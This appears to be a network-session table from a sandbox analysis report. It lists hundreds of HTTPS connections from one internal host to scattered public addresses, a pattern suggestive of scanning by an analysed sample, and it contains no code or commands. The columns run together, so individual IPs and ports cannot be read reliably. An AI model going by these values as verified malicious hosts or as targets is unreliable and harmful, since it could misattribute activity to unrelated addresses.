                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11282192.168.2.1335794208.74.201.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11283192.168.2.1338444175.98.20.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11284192.168.2.1353794167.102.223.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11285192.168.2.1360782171.41.5.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11286192.168.2.1339042154.143.170.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11287192.168.2.134948618.116.250.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11288192.168.2.1343464102.216.255.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11289192.168.2.1350432137.203.240.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11290192.168.2.1346558118.239.238.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11291192.168.2.133941297.238.196.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11292192.168.2.134827475.133.247.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11293192.168.2.1334326134.11.176.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11294192.168.2.1345574209.191.98.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11295192.168.2.1346218210.112.180.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11296192.168.2.1357562217.8.133.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11297192.168.2.1348068211.228.33.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11298192.168.2.1342716191.227.127.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11299192.168.2.133410891.49.128.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11300192.168.2.1352952217.44.92.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11301192.168.2.135926436.236.229.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11302192.168.2.133677843.85.223.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11303192.168.2.1358182145.35.35.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11304192.168.2.134033873.186.84.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11305192.168.2.1338750138.82.227.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11306192.168.2.1353908119.126.239.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11307192.168.2.134961045.128.119.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11308192.168.2.1348920126.103.136.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11309192.168.2.134626273.117.11.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11310192.168.2.1359026139.62.144.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11311192.168.2.135093674.143.84.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11312192.168.2.1356676135.181.194.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11313192.168.2.1346874197.58.23.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11314192.168.2.1343690213.118.107.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11315192.168.2.13414262.225.10.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11316192.168.2.134219013.47.124.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11317192.168.2.133582887.143.152.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11318192.168.2.1358346180.149.62.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11319192.168.2.1350178176.126.137.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11320192.168.2.1356188123.38.131.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11321192.168.2.1357944152.55.190.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11322192.168.2.1356140212.131.166.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11323192.168.2.134255083.43.32.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11324192.168.2.135963644.9.145.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11325192.168.2.135173232.91.232.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11326192.168.2.1334498204.193.136.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11327192.168.2.134244688.176.250.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11328192.168.2.1337432180.170.202.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11329192.168.2.1344904156.89.75.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11330192.168.2.1334560110.220.102.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11331192.168.2.134777254.222.4.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11332192.168.2.136055048.105.177.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11333192.168.2.1346602196.8.200.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11334192.168.2.1354140183.76.68.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11335192.168.2.1360346151.147.59.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11336192.168.2.1342928120.251.75.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11337192.168.2.1356358122.208.80.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11338192.168.2.1350498112.172.108.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11339192.168.2.1335440178.131.159.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11340192.168.2.133910281.59.93.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11341192.168.2.135234298.139.14.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11342192.168.2.13359509.61.90.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11343192.168.2.1335872139.10.53.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11344192.168.2.134842858.150.25.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11345192.168.2.1345000222.202.234.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11346192.168.2.1354228144.38.67.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11347192.168.2.135615419.174.160.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11348192.168.2.1352740219.155.241.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11349192.168.2.134238249.152.171.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11350192.168.2.1339488116.99.113.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11351192.168.2.134803023.232.219.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11352192.168.2.1345056212.183.105.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11353192.168.2.134062238.158.12.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11354192.168.2.134048865.33.104.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11355192.168.2.1332784155.212.104.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11356192.168.2.1332888167.2.233.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11357192.168.2.1346422144.30.103.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11358192.168.2.1359054104.221.247.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11359192.168.2.1346348156.243.174.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11360192.168.2.134601617.73.49.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11361192.168.2.1350358125.18.74.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11362192.168.2.1354038169.181.246.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11363192.168.2.1339288181.103.5.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11364192.168.2.1356290155.249.185.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11365192.168.2.135193643.153.87.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11366192.168.2.1336314101.60.235.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11367192.168.2.1357514192.99.163.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11368192.168.2.1340382135.17.50.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11369192.168.2.1352878171.140.4.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11370192.168.2.134607450.95.91.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11371192.168.2.1345096105.206.102.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11372192.168.2.133642495.215.167.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11373192.168.2.134535087.250.128.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11374192.168.2.134103842.0.124.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11375192.168.2.1344532211.75.214.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11376192.168.2.1335144123.218.170.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11377192.168.2.1359756212.214.121.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11378192.168.2.133505651.241.12.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11379192.168.2.1344384141.148.102.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11380192.168.2.1346436222.106.172.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11381192.168.2.1355154131.21.189.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11382192.168.2.1358084206.173.87.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11383192.168.2.1349598199.77.231.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11384192.168.2.133780418.190.2.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11385192.168.2.134272435.234.28.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11386192.168.2.1350160207.87.153.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11387192.168.2.1335756143.99.214.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11388192.168.2.1333990185.214.34.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11389192.168.2.134404683.253.185.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11390192.168.2.135956686.86.2.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11391192.168.2.1348406163.92.163.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11392192.168.2.1345074153.186.193.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11393192.168.2.135954461.77.250.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11394192.168.2.135442827.71.97.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11395192.168.2.1335202100.241.137.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11396192.168.2.134332884.146.202.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11397192.168.2.135033843.182.106.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11398192.168.2.1359648202.12.213.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11399192.168.2.13497642.145.220.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11400192.168.2.1348094103.71.167.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11401192.168.2.1351122149.35.30.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11402192.168.2.1346382104.86.163.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11403192.168.2.1349298171.130.8.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11404192.168.2.133643857.60.226.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11405192.168.2.1356746209.180.76.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11406192.168.2.1355464180.116.16.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11407192.168.2.134919640.231.27.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11408192.168.2.1334594184.235.44.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11409192.168.2.134916237.186.119.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11410192.168.2.1337782176.63.128.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11411192.168.2.1356740187.139.134.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11412192.168.2.1351344177.237.19.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11413192.168.2.135459891.250.119.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11414192.168.2.1334880101.66.165.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11415192.168.2.134456463.195.132.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11416192.168.2.1357304144.248.135.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11417192.168.2.1347354144.62.56.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11418192.168.2.1334814179.165.240.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11419192.168.2.1341840147.122.2.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11420192.168.2.1342134141.162.91.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11421192.168.2.1344724191.136.135.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11422192.168.2.1344650205.69.223.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11423192.168.2.1346952187.136.129.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11424192.168.2.133446889.163.146.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11425192.168.2.134557691.185.84.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11426192.168.2.135022035.128.111.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11427192.168.2.1352824111.96.183.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11428192.168.2.134432817.95.163.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11429192.168.2.1349950121.178.44.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11430192.168.2.134445885.193.119.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11431192.168.2.133523243.99.158.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11432192.168.2.134934041.117.133.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11433192.168.2.1345280122.11.79.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11434192.168.2.1343616220.181.123.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11435192.168.2.1336506155.218.5.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11436192.168.2.135242435.96.241.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11437192.168.2.1333218217.174.63.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11438192.168.2.1351892148.234.131.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11439192.168.2.1360184103.239.178.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11440192.168.2.133536073.103.37.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11441192.168.2.134256038.80.231.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11442192.168.2.1353392163.113.234.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11443192.168.2.133992675.102.124.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11444192.168.2.1342360150.46.241.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11445192.168.2.1348694207.1.74.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11446192.168.2.1356582196.61.110.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11447192.168.2.134550051.19.113.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11448192.168.2.1354988146.199.158.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11449192.168.2.1350736108.7.234.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11450192.168.2.1336512202.93.253.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11451192.168.2.1350998162.48.154.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11452192.168.2.1346530180.124.170.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11453192.168.2.134016840.191.62.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11454192.168.2.135423873.107.122.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11455192.168.2.134319289.200.250.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11456192.168.2.1350072104.81.135.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11457192.168.2.1348640126.90.65.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11458192.168.2.134240259.159.37.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11459192.168.2.13465941.167.174.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11460192.168.2.1354706101.222.253.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11461192.168.2.1351276170.122.64.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11462192.168.2.1347626195.87.172.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11463192.168.2.1343978220.154.155.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11464192.168.2.135793462.23.63.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11465192.168.2.133755814.104.238.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11466192.168.2.1359132168.83.240.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11467192.168.2.1336742217.127.9.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11468192.168.2.1353844142.170.168.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11469192.168.2.1351044193.150.8.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11470192.168.2.1358466175.117.107.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11471192.168.2.1334294190.183.237.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11472192.168.2.1341222166.5.245.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11473192.168.2.133404249.208.235.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11474192.168.2.134183287.25.8.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11475192.168.2.135505061.12.167.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11476192.168.2.134457068.44.211.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11477192.168.2.1334096177.195.187.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11478192.168.2.1340836157.94.221.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11479192.168.2.133325262.185.167.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11480192.168.2.1349230184.72.10.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11481192.168.2.1358676180.81.65.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11482192.168.2.133323268.76.99.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11483192.168.2.1344954135.149.112.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11484192.168.2.1345686153.23.92.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11485192.168.2.1353918191.176.3.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11486192.168.2.1335874122.182.205.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11487192.168.2.1348772201.222.234.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11488192.168.2.13478849.169.80.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11489192.168.2.135816023.39.157.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11490192.168.2.1349942184.39.20.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11491192.168.2.1351426184.18.97.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11492192.168.2.1337690222.242.20.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11493192.168.2.1336364138.174.32.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11494192.168.2.1342300112.138.169.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11495192.168.2.1352342174.164.156.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11496192.168.2.135118044.242.199.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11497192.168.2.135244842.109.77.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11498192.168.2.135263278.157.41.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11499192.168.2.135271269.166.110.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11500192.168.2.1336020160.108.93.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11501192.168.2.1335838150.24.227.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11502192.168.2.135196234.244.210.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11503192.168.2.134348297.199.65.103443
